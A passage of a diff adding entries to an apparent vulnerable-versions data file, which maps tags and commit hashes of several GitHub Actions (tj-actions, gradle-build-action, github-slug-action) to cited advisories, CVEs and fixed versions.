["tj-actions/changed-files", "v11.4", "b54a7ae7259d0729d0b582bac28b05462f16cd64", "41"] + - ["tj-actions/changed-files", "v11.3", "902e60737927ccef3713faad3752d84f1153d7ac", "41"] + - ["tj-actions/changed-files", "v11.2", "2b51570d5f086eb07a1e527a182773b2045ec26b", "41"] + - ["tj-actions/changed-files", "v11.1", "040111b36775c1033b4703b77f9c5c203da18936", "41"] + - ["tj-actions/changed-files", "v11", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v10.1", "1d34e69895b85e643b9b259d54f395f0d1e27c10", "41"] + - ["tj-actions/changed-files", "v10", "b86b537e2b78397b630cfb1a8d0aec1e03379737", "41"] + - ["tj-actions/changed-files", "v9.3", "2a771ad30d623c27165b3677688ebe3f17c49f65", "41"] + - ["tj-actions/changed-files", "v9.2", "75933dc40b241db3752ed4c9e2f24cb7cfff51f9", "41"] + - ["tj-actions/changed-files", "v9.1", "2c0d12b627191145ce31c2a098d8d37e93b35861", "41"] + - ["tj-actions/changed-files", "v9", "7abdbc94e90b9a9b002ad86d8d2a5f9472c3c75c", "41"] + - ["tj-actions/changed-files", "v8.9", "675ab58887b9ae58d77d4dcd2d5e58228ab5f185", "41"] + - ["tj-actions/changed-files", "v8.8", "8c6f276ea5961fa51474aaa203c6d06226acbaa8", 
"41"] + - ["tj-actions/changed-files", "v8.7", "d825b1f7094e756ca34581aaab611003eaa23975", "41"] + - ["tj-actions/changed-files", "v8.6", "0bd70b7aecded5f2eb1f0498c3692433f2453b37", "41"] + - ["tj-actions/changed-files", "v8.5", "0fe67a1f15b48dcd40e7ea0dfdd4afc9418febf0", "41"] + - ["tj-actions/changed-files", "v8.4", "7bfa539f0d6ed4331d2899e7440a1946929829c1", "41"] + - ["tj-actions/changed-files", "v8.3", "d679de9200b28e963362cba99095dd8d9f23d446", "41"] + - ["tj-actions/changed-files", "v8.2", "1e10ed49507767257514a643ca1baab24a5496af", "41"] + - ["tj-actions/changed-files", "v8.1", "0754fdabe31b721683e1ffc719584df67ad24c87", "41"] + - ["tj-actions/changed-files", "v8", "d290bdd91e68dcf1bafe3fa63280666077cbc61c", "41"] + - ["tj-actions/changed-files", "v7", "15b1769fc52da64fe168a41ccb01c48b27687149", "41"] + - ["tj-actions/changed-files", "v6.3", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v6.2", "5fe8e4d60450bbe483ca011b747c4a972a79ef07", "41"] + - ["tj-actions/changed-files", "v6.1", "7c66aa285d3ec22f1b8442b9a498ebb76ca5f57b", "41"] + - ["tj-actions/changed-files", "v6", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v5.3", "e95bba87d2bd0b2bab4094abd9755a74f16703e6", "41"] + - ["tj-actions/changed-files", "v5.2", "7852058eeee10d857e59ce41f3cb465a70c96ae0", "41"] + - ["tj-actions/changed-files", "v5.1", "81f32e24026825ecfb7cb5d3951f91cfe788b0ad", "41"] + - ["tj-actions/changed-files", "v5.0.0", "450eadf5a0462f8d0b5e99d07d4b6d8f7358420c", "41"] + - ["tj-actions/changed-files", "v5", "0e956bb09e9b05df440a2459a041cdec3cc0cc0c", "41"] + - ["tj-actions/changed-files", "v4.4", "300e935beb285fcda513be84333e8726d5a544fb", "41"] + - ["tj-actions/changed-files", "v4.3", "fcb2ab8c32c2b66fdf94ab3deede353f8fe6f77c", "41"] + - ["tj-actions/changed-files", "v4.2", "271bbd60fedbc83dbb8cb00ce88bb4532d940e2f", "41"] + - ["tj-actions/changed-files", "v4.1", "e8ace0110cd60a2a0a729d52078ad6cec839dbb9", 
"41"] + - ["tj-actions/changed-files", "v4.0.7", "473984bd85c24f1fe61c0494d317cc7d490e1235", "41"] + - ["tj-actions/changed-files", "v4.0.6", "032f37fd241eeaf66ead8120552a3c6a157d1f22", "41"] + - ["tj-actions/changed-files", "v4.0.5", "3a35bdf667b36191faf1eea2b8c2cfbb8890bd25", "41"] + - ["tj-actions/changed-files", "v4.0.4", "c2216f65fdd828a28c41d6c97d242ec39ed694f3", "41"] + - ["tj-actions/changed-files", "v4.0.3", "0f16c26f3d5699a26be12446509c537ee964c1a8", "41"] + - ["tj-actions/changed-files", "v4.0.2", "271468ecafc0c12c5f0ce364317a640a5668eba7", "41"] + - ["tj-actions/changed-files", "v4.0.1", "fb063fc7d459d8ee25f9b3ed48ec83bc5c51df72", "41"] + - ["tj-actions/changed-files", "v4.0.0", "a05436ffa9505d25707f781260a99d01cebd0d13", "41"] + - ["tj-actions/changed-files", "v4", "c061ef1fa3d028267a34edff2d42a34c8d56ec53", "41"] + - ["tj-actions/changed-files", "v3.3", "489e2d514f3a230d66dbf74efec7ceed7b171703", "41"] + - ["tj-actions/changed-files", "v3.2", "8d5a33c6034b0991a3fe85b2e73012a689eadf92", "41"] + - ["tj-actions/changed-files", "v3.1", "fbfaba544e2ae235b2f88c936bcd5f8aa12419cc", "41"] + - ["tj-actions/changed-files", "v3.0.2", "1980f551b48196e1d8aa48fbfd924cedde0d3e13", "41"] + - ["tj-actions/changed-files", "v3.0.1", "a86b5608ded2e43fee87cbbde6394e0be7f46a41", "41"] + - ["tj-actions/changed-files", "v3.0.0", "f917cc3459f79321da6af2a153cb91ce82a34aaf", "41"] + - ["tj-actions/changed-files", "v3", "e18ccae8fe477263087493451ea812d4d36faa4e", "41"] + - ["tj-actions/changed-files", "v2.1", "e1d275d6d3255d6a586052675d3c5cef793edccf", "41"] + - ["tj-actions/changed-files", "v2.0.1", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v2.0.0", "9c1a181e67797cd053d15062eda07b2b322bbbfe", "41"] + - ["tj-actions/changed-files", "v2", "5eaa2d80dddfe7de6f7cc75fcaeb554851737685", "41"] + - ["tj-actions/changed-files", "v1.3.1", "188487d180e816622215bd011cbaca666af41ed9", "41"] + - ["tj-actions/changed-files", "v1.3.0", 
"30988915fa46789ba51cc1436c92488a52ac44ee", "41"] + - ["tj-actions/changed-files", "v1.2.2", "467d26c8b77612d9f7d20df5271edc207eae69a7", "41"] + - ["tj-actions/changed-files", "v1.2.1", "d9eb683b30e5b231c948331ad364b991fa8be544", "41"] + - ["tj-actions/changed-files", "v1.2.0", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v1.1.3", "8e7cc77ab9c1bffc233f2f3023d1b89ed44c9af5", "41"] + - ["tj-actions/changed-files", "v1.1.2", "81ad4b874479c31a00285815995079e20c6c2779", "41"] + - ["tj-actions/changed-files", "v1.1.1", "5e2a2f192377df7d67537b0e788e1b53e8a76f12", "41"] + - ["tj-actions/changed-files", "v1.1.0", "1af9ab38306a2fa478c9772eabab167444dbc755", "41"] + - ["tj-actions/changed-files", "v1.0.3", "55a857d66a8e01f50a2a37d18239edde79b1668d", "41"] + - ["tj-actions/changed-files", "v1.0.2", "62a9200adfe8200623dcd28ca74973e82baa954c", "41"] + - ["tj-actions/changed-files", "v1.0.1", "b915d091052b9d35e7c200d1da10cc6e2ec266e2", "41"] + - ["tj-actions/changed-files", "v1.0.0", "f0751de6af436d4e79016e2041cf6400e0833653", "41"] + - ["tj-actions/changed-files", "v1", "eef94236f6b9dec768f89dc72b9e0b64e13bb36e", "41"] + + # tj-actions/verify-changed-files + # https://github.com/advisories/GHSA-ghm2-rq8q-wrhc + # CVE-2023-52137 + - ["tj-actions/verify-changed-files", "v16.1.1", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v16.1.0", "a9b6fd340565065ad293625200630be7fd2b0f13", "17"] + - ["tj-actions/verify-changed-files", "v16.0.1", "30aa174f53f67ecd5dc8e190dfbe46392202e5a5", "17"] + - ["tj-actions/verify-changed-files", "v16.0.0", "7f1b21ceb7ef533b97b46e89e2f882ee5cb17ae0", "17"] + - ["tj-actions/verify-changed-files", "v16", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v15.0.2", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v15.0.1", "7da22d0521c254e711e5988bd2c7d48c2948d137", "17"] + - 
["tj-actions/verify-changed-files", "v15.0.0", "7016858e130743cc6c6b472849411d40aa8ae1ce", "17"] + - ["tj-actions/verify-changed-files", "v15", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v14.0.2", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v14.0.1", "bad2f5d7fc7e6812ac48d7e7207025a5a4cc93d3", "17"] + - ["tj-actions/verify-changed-files", "v14.0.0", "3b573ace62e287c3d68e24e4de2ee0c6f6280d86", "17"] + - ["tj-actions/verify-changed-files", "v14", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v13.2.0", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v13.1", "9ed3155b72ba709881c967f75611fc5852f773b9", "17"] + - ["tj-actions/verify-changed-files", "v13", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v12.0", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v12", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v11.1", "1d7ee9711b0a8f675208004e66bc25d593a1a0ae", "17"] + - ["tj-actions/verify-changed-files", "v11", "c4322970b4f055ede155b95586b04562796f83b7", "17"] + - ["tj-actions/verify-changed-files", "v10.1", "6e986dfff1f61105bc496287b5bbf0776092737e", "17"] + - ["tj-actions/verify-changed-files", "v10", "fa6ea307b32e5314d4a62b1209c3c782d5b5dcc9", "17"] + - ["tj-actions/verify-changed-files", "v9.2", "6f40ee1d523d9a9223204ae06919a3b2739702dc", "17"] + - ["tj-actions/verify-changed-files", "v9.1", "1b13d2556290c5ca5a94b7d042b91f3519c17d38", "17"] + - ["tj-actions/verify-changed-files", "v9", "c09bcad97929b17bacf737670bee312af98be94f", "17"] + - ["tj-actions/verify-changed-files", "v8.8", "fda469d6b456070da68fa3fdbc07a513d858b200", "17"] + - ["tj-actions/verify-changed-files", "v8.7", "bd1e271a8d26e249e0412899d4e3d8f5a89ecd6c", "17"] + - 
["tj-actions/verify-changed-files", "v8.6", "367ba21c800e2a2b1451e272d24cf0caa3e4f9e4", "17"] + - ["tj-actions/verify-changed-files", "v8.5", "9dea97ec0f35d708d32dadd9b34a6af7cc28b19f", "17"] + - ["tj-actions/verify-changed-files", "v8.4", "c154cc6a77695d4483937745499e07fee62addd3", "17"] + - ["tj-actions/verify-changed-files", "v8.3", "527ff7533afca6e5bece96bd15a998f90f54c624", "17"] + - ["tj-actions/verify-changed-files", "v8.2", "e8756d59f6d66ad7376c293832e4d6eda8ae3257", "17"] + - ["tj-actions/verify-changed-files", "v8.1", "bcb4e766c132157cda3d1e8c7ca3d68d86d6ae6b", "17"] + - ["tj-actions/verify-changed-files", "v8", "25267f57f3afa6c59f1495e52da8b08c2c586606", "17"] + - ["tj-actions/verify-changed-files", "v7.2", "ea24bfd8ba4b019cb321502a4382a7a44b6ebc01", "17"] + - ["tj-actions/verify-changed-files", "v7.1", "f2a40baded88e47fa3f8e0f614832835194f4904", "17"] + - ["tj-actions/verify-changed-files", "v7", "197e12135dd5eaedd520a27882d17c1f384cf6a0", "17"] + - ["tj-actions/verify-changed-files", "v6.2", "a8f1b11a7c4dfc6706d8c64416dda0ef85d06e77", "17"] + - ["tj-actions/verify-changed-files", "v6.1", "95c26dda77430743cb3542d24b3e739417f5a881", "17"] + - ["tj-actions/verify-changed-files", "v6", "97ba4ccf1285bdfca165bc0b0a7cb1f994dae04e", "17"] + - ["tj-actions/verify-changed-files", "v5.7", "68310bb8f2a087df9f6ab1a2cc07c1e7cfc8ea28", "17"] + - ["tj-actions/verify-changed-files", "v5.6", "720ba6a5776e8687117603acab16000c0fc8868b", "17"] + - ["tj-actions/verify-changed-files", "v5.5", "cedd7096b7f23ae0307d7d82f516d666580579b3", "17"] + - ["tj-actions/verify-changed-files", "v5.4", "d68d3d232ffbba653ab0227d4bb2001cda681d12", "17"] + - ["tj-actions/verify-changed-files", "v5.3", "2e1153b8d1546dea7cd1a9db9834daceb72af17a", "17"] + - ["tj-actions/verify-changed-files", "v5.2", "c3dd6355e363eab778c129867f91da02e3285961", "17"] + - ["tj-actions/verify-changed-files", "v5.1", "81bd1de29366c53364b43cf83c4a4ddcab53b571", "17"] + - ["tj-actions/verify-changed-files", "v5", 
"31a9c7487cc1096253faa121489f4dbb32ca4132", "17"] + - ["tj-actions/verify-changed-files", "v4", "e981d37638f538ab477279c9f1fb6048462fd161", "17"] + - ["tj-actions/verify-changed-files", "v3.0.4", "e7f801cef44ca52e9aa496526dcd71daf5ef8437", "17"] + - ["tj-actions/verify-changed-files", "v3.0.3", "e86d0b9d1805c4e84fc90d4bcdab7371e14173d2", "17"] + - ["tj-actions/verify-changed-files", "v3.0.2", "ad255a4b81fa69c78f5fd1bb8ac95739dd3a9580", "17"] + - ["tj-actions/verify-changed-files", "v3.0.1", "3a8aed1f8847cc121e5f08e8963755154bb9df9e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.gamma", "de910b5a2cdd6814c6e41d2b7c6f678eb75d430a", "17"] + - ["tj-actions/verify-changed-files", "v3.0.g", "d31b2a1fd119abbeddd18df3d95001a141b37372", "17"] + - ["tj-actions/verify-changed-files", "v3.0.beta", "e61c6fc5323423d2f0d9f04c7d15fa52af1084b0", "17"] + - ["tj-actions/verify-changed-files", "v3.0.b", "380890dc80695b7aa8047c0f824f87234defabd7", "17"] + - ["tj-actions/verify-changed-files", "v3.0.alpha", "873cfd676aea5e2a04b3f16706bd590effb5023e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.a", "b0c60c86ab292cabeb4b4dc9f34c296c314fdfbb", "17"] + - ["tj-actions/verify-changed-files", "v3", "71831832d68f9fa5b527a9d692df35e1626ddfa2", "17"] + - ["tj-actions/verify-changed-files", "v2.0a", "6555389afba06cce81bc2f57a191d54f380ece0a", "17"] + - ["tj-actions/verify-changed-files", "v2", "9828a95864031bd113695ad5c68944163008d861", "17"] + - ["tj-actions/verify-changed-files", "v1.0.1", "8150cee7a747364d6b113cf8b0f59af88453a161", "17"] + - ["tj-actions/verify-changed-files", "v1", "48ddf88305af39076d425f86f0617d6f7ff23d58", "17"] + + # tj-actions/branch-names + # https://github.com/advisories/GHSA-8v8w-v8xg-79rf + # CVE-2023-49291 + - ["tj-actions/branch-names", "v7.0.6", "ab304d8562e2f137165e1d930e6d22d431189074", "7.07"] + - ["tj-actions/branch-names", "v7.0.5", "033f2358d95522973eee35810e35a86fae4a71d8", "7.07"] + - ["tj-actions/branch-names", "v7.0.4", 
"f7cfbc8edeb70a87ebec52e94fa8366f5077d0bc", "7.07"] + - ["tj-actions/branch-names", "v7.0.3", "309671a59e1143038c2a50f009b6adf301f6aa71", "7.07"] + - ["tj-actions/branch-names", "v7.0.2", "636cfe47b2002897ee4d3f07792c9fdd5d7dc725", "7.07"] + - ["tj-actions/branch-names", "v7.0.1", "4e532392367d7e4fb2f494f2d50c47562660cce5", "7.07"] + - ["tj-actions/branch-names", "v7.0.0", "604fda4f4254216e3b564d60fe27d68017756558", "7.07"] + - ["tj-actions/branch-names", "v6.5", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v6.4", "eee8675bd61ec38bcfbfedd504d8473292ba649e", "7.07"] + - ["tj-actions/branch-names", "v6.3", "a594c1e96eab7790611fdaf5bc8f76ea55cedabd", "7.07"] + - ["tj-actions/branch-names", "v6.2", "b90df97be1c548ac9c8bd9186bfea6747153bf5e", "7.07"] + - ["tj-actions/branch-names", "v6.1", "09ab61130975078eb7cde103fe8d2ae1649a1853", "7.07"] + - ["tj-actions/branch-names", "v6", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v5.6", "63b65253bc9542d36a60646299bd8c9af6d9ce7e", "7.07"] + - ["tj-actions/branch-names", "v5.5", "a704b89383028b5df2a4fd0b9fac9711970f18be", "7.07"] + - ["tj-actions/branch-names", "v5.4", "b0f914ba0e7aa1e243b53df97447f71eb57da09a", "7.07"] + - ["tj-actions/branch-names", "v5.3", "e0e3be64a3f10f671bb526b715f86a8a834dce75", "7.07"] + - ["tj-actions/branch-names", "v5.2", "9cd06d955f4184031cd71fbb1717ac268ade2ee0", "7.07"] + - ["tj-actions/branch-names", "v5.1", "b99758d88d96a27ee98b444451c1602a4507d243", "7.07"] + - ["tj-actions/branch-names", "v5", "dc2e78ac9284175fdc0f2d505d8b49ef99632ea8", "7.07"] + - ["tj-actions/branch-names", "v4.9", "12c1d475292ae9bb96656e80c24172db3cd60ffb", "7.07"] + - ["tj-actions/branch-names", "v4.8", "af5c6741e639608a1c0e87eaa3c0c414d427d9e4", "7.07"] + - ["tj-actions/branch-names", "v4.7", "28a6a95bc5bcc69b16010647668f1c5c4fd0dcca", "7.07"] + - ["tj-actions/branch-names", "v4.6", "b0fc3aebc2f3fb8edfd024aea4dc8a073d10db88", "7.07"] + - 
["tj-actions/branch-names", "v4.5", "a0061fbc59329b02d6c530f25b9d3fc80340a792", "7.07"] + - ["tj-actions/branch-names", "v4.4", "ce1737e426445fcb5b05a09e984b66d0b27548ba", "7.07"] + - ["tj-actions/branch-names", "v4.3", "47910e48331f8d64a4d535a35e9540c1ebf767f7", "7.07"] + - ["tj-actions/branch-names", "v4.2", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v4.1", "98c04d51ee204c4f23daee8ee15af9e8e80e36b2", "7.07"] + - ["tj-actions/branch-names", "v4", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v3.6", "3e0215fc2dd14b3e395f99b5e2cc1e4d93afe1b6", "7.07"] + - ["tj-actions/branch-names", "v3.5", "b587231a9abec0da6f45dbaea42d88a9c130ee8f", "7.07"] + - ["tj-actions/branch-names", "v3.4", "dd9939e9966a18c8ce9bfcf188731c4746faf197", "7.07"] + - ["tj-actions/branch-names", "v3.3", "509c3124abef4caaeb784a5aa6f465da588e0c43", "7.07"] + - ["tj-actions/branch-names", "v3.2", "ae7cf1163ab1375b4bbf5ec6d16a686118dac27d", "7.07"] + - ["tj-actions/branch-names", "v3.1", "eb14b2dffd7af08b599b691d72b757ae607675bd", "7.07"] + - ["tj-actions/branch-names", "v3", "fdb3a42221b1ee981def2a3e7767bd3ffcda0ff7", "7.07"] + - ["tj-actions/branch-names", "v2.2", "4362da73333d3a6ecf81047f6ae055cad78fcb38", "7.07"] + - ["tj-actions/branch-names", "v2.1", "8c72ffde4df03225c479f93fef608d8cdd1042f3", "7.07"] + - ["tj-actions/branch-names", "v2", "8307330ac59a26bd125a6f99c33820dd0baf439f", "7.07"] + - ["tj-actions/branch-names", "v1", "549ca323b2179ffc0f7f828b555e88fe53da3787", "7.07"] + + # gradle/gradle-build-action + # https://github.com/advisories/GHSA-h3qr-39j9-4r5v + # CVE-2023-30853 + - ["gradle/gradle-build-action", "v2.4.1", "5056fa9d50478a14af3c9925c12ca02318659d3e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.4.0", "6095a76664413da4c8c134ee32e8a8ae900f0f1f", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.3", "3fbe033aaae657f011f88f29be9e65ed26bd29ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.2", 
"fd32ae908111fe31afa48827bd1ee909540aa971", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.1", "c295a4096e1d2c453eaf1f65c6f96686e26bd8be", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0", "356abb47e7664b5505e25d7997a5a522a17c62d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0-beta.1", "d427a379a8cc30e1c773080ce783e7e6d5167584", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.5", "cd579d970f8aec1cf0cae5f62a8e418768970015", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.4", "bf2a15ee94874758c21b91220b4d0ab84f762423", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.3", "9411346324b44f5402cbef3ac5a83a411086aa9a", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.2", "cd3cedc781988c804f626f4cd2dc51d0bdf02a12", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.1", "67421db6bd0bf253fb4bd25b31ebb98943c375e1", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0", "e88ed3e650b26bd116cfee53cf198c1f6856682d", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.2", "de51428ba55149e7c6f6957a566b8759efd425de", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.1", "63bcd47c1be270a660a151ce2b7848b8730f06ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-beta.1", "26ea4afa082ddf7e3e5bcf6d12283111b6f3f837", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.7", "9b814496b50909128c6a52622b416c5ffa04db49", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.6", "116ac10f8131939c7e405884cb2456067b0479e9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.5", "fec4a42eb0c83154e5c9590748ba8337949c5701", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.4", "0d13054264b0bb894ded474f08ebb30921341cee", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.3", "937999e9cc2425eddc7fd62d1053baf041147db7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.2", "bc3340afc5e3cc44f2321809ac090d731c13c514", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.1", "b9c806c75d3cb8998f905077e62bb670e7fa7e02", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.0", 
"3edb3cb004617998d8cf56fe2ebf9d59602e713e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.1", "996094e8e808208e5738e8413b3f55d24d1c1eb7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.0", "4137be6a8bf7d7133955359dbd952c0ca73b1021", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.3", "4e899835b3bddb7d01d3a988e6c53d67ec8a76e2", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.2", "2a57ddf74a257b005f65f70cbf15e8e7f06292d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.1", "db2b34260fe57577fec47305e78a20755eef0441", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.7", "cba1833ddecbbee649950c284416981928631008", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.6", "a94b9252d5d8ca83eed3f76a856f2ba046b1b3c6", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.5", "263f84178a82449371326ba2c1d781bc4b4bb9ac", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.4", "29894757f3fd1d4752e4efadb74896d39873a0ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.3", "c000a0b58fe0ad402c613a864ea3ed26d6e88fd0", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.2", "21dee7159020ab3140bebfd2280a6f34ef4e08ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.1", "bebb162342333983b660d21f31c90f33950f5023", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.0", "e0c2736e35d366e96bb202d1af817db9d562da2f", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.1", "3f3947669a3fe6883ed8dab14671bdc6042ec2d9", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.0", "579711fd3cd8691fbc0cab64db65e9c1e586658e", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.3", "90ccf054e6b9905f30f98c938bce4c6acd323b6b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.2", "c6b57b9c8c4f72268b10f151623ce6a2855c6387", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.1", "791b98c5656178712736d390e91be71eadfe192e", "2.4.2"] + - ["gradle/gradle-build-action", 
"v1.3.0", "27da3e28b3c4cc84c9e7965dc2371f969e582049", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.1", "e220e54c83b8f1a546d8e6d598490231fe2bf64b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.0", "720051268d4728af6b7e0defa8ed8097b20ef218", "2.4.2"] + - ["gradle/gradle-build-action", "v1.1.0", "d0c5f7955e911444399df5d044916a49bdccff00", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.2", "064f85c1568a6fd57b32d8f98c0dc9f237c59156", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.1", "6170f06e8dd334a7f6879781c2ed4889c4cc76bf", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.0", "2d5ca45eab01ff2ce82777ab670ff2bd5d8cf8d5", "2.4.2"] + - ["gradle/gradle-build-action", "v1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + + # rlespinasse/github-slug-action + # https://github.com/advisories/GHSA-6q4m-7476-932w + # CVE-2023-27581 + - ["rlespinasse/github-slug-action", "v4.4.1", "102b1a064a9b145e56556e22b18b19c624538d94", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.4.0", "a362e5fb42057a3a23a62218b050838f1bacca5d", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.2", "b011e83cf8cb29e22dda828db30586691ae164e4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.1", "00198f89920d4454e37e4b27af2b7a8eba79c530", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.0", "9c3571fd3dba541bfdaebc001482a49a1c1f136a", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.9.0", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.8.0", "4a00c29bc1c0a737315b4200af6c6991bb4ace18", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.1", "5150a26d43ce06608443c66efea46fc6f3c50d38", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.0", "ebfc49c0e9cd081acb7ba0634d8d6a711b4c73cf", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - 
["rlespinasse/github-slug-action", "v3.x", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v2.x", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "v1.1.x", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.4", "33cd7a701db9c2baf4ad705d930ade51a9f25c14", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.3", "1615fcb48b5315152b3733b7bed1a9f5dfada6e3", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.2", "4177734b38a3d59604747bf47e537ccb6bcb9cdf", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.1", "7a3b4c1766ad8e6d23ab37d33417392509ff84e2", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.0", "dbbe21b72b96929fe6e67275c332f43599b31274", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.1.0", "88f3ee8f6f5d1955de92f1fe2fdb301fd40207c6", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.1", "cd9871b66e11e9562e3f72469772fe100be4c95a", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.0", "bd31a9f564f7930eea1ecfc8d0e6aebc4bc3279f", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.1", "1bf76b7bc6ef7dc6ba597ff790f956d9082479d7", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.0", "172fe43594a58b5938e248ec757ada60cdb17e18", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.1", "016823880d193a56b180527cf7ee52f13c3cfe33", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.0", "4060fda2690bcebaabcd86db4fbc8e1c2817c835", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.4.0", "0c099abd978b382cb650281af13913c1905fdd50", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.3.0", "d1880ea5b39f611effb9f3f83f4d35bff34083a6", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.2.0", "c8d8ee50d00177c1e80dd57905fc61f81e437279", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.1.0", 
